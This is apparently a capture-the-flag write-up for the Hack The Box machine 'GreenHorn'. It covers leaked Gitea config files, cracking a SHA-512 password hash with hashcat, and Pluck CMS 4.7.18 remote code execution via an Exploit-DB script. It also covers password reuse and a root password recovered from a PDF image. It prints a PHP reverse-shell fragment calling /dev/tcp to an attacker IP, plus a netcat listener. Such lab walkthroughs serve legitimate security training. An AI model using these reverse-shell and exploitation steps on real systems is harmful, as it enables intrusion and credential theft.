The machine hosts a Gitea instance exposing sensitive configuration files. Credentials recovered from the repository allow access to the Pluck CMS admin panel. A known Pluck 4.7.18 vulnerability provides RCE. Privilege escalation is achieved through a hidden message embedded in a PDF image.
Target: greenhorn.htb
Initial vector: Gitea repository leakage
Privilege escalation: hidden message → root SSH password
Web application:
http://greenhorn.htb:3000/
The site exposes a Gitea instance. A cookie appears during browsing:
i_like_gitea=b996728efa716641
Browse public repositories:
http://greenhorn.htb:3000/explore/repos
Inside GreenAdmin/GreenHorn, several configuration files are accessible:
data/settings/token.php data/settings/options.php data/settings/pass.php
The password hash in pass.php is SHA‑512.
Crack it:
$ hashcat -a 0 -m 1700 hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt -> iloveyou1
Login to Pluck CMS:
http://greenhorn.htb/login.php user: admin@greenhorn.htb pass: iloveyou1
Pluck version: 4.7.18 This version is vulnerable (Exploit‑DB 51592).
Exploit reference:
https://www.exploit-db.com/exploits/51592
Prepare a PHP reverse shell:
& /dev/tcp/10.10.14.48/443 0>&1'"); ?>
Zip it:
$ zip -r miriabbas.zip miri.php
Start listener:
$ nc -nlvp 443
Run the exploit:
$ python3 51592.py
A shell is obtained.
Switch to junior (password reused):
$ su junior Password: iloveyou1
A PDF file on the system contains an embedded image. Extract images:
$ pdfimages Using\ OpenVas.pdf pixeled $ feh output.png
The image reveals a phrase:
sidefromsidetheothersidesidefromsidetheotherside
This is the root SSH password.
SSH as root:
$ ssh root@greenhorn.htb Password: sidefromsidetheothersidesidefromsidetheotherside
Root access obtained.
The machine relies on exposed Gitea configuration files to leak admin credentials. Pluck CMS 4.7.18 is then exploited for RCE, followed by password reuse to access another user. A hidden message inside a PDF image provides the root password, completing the compromise.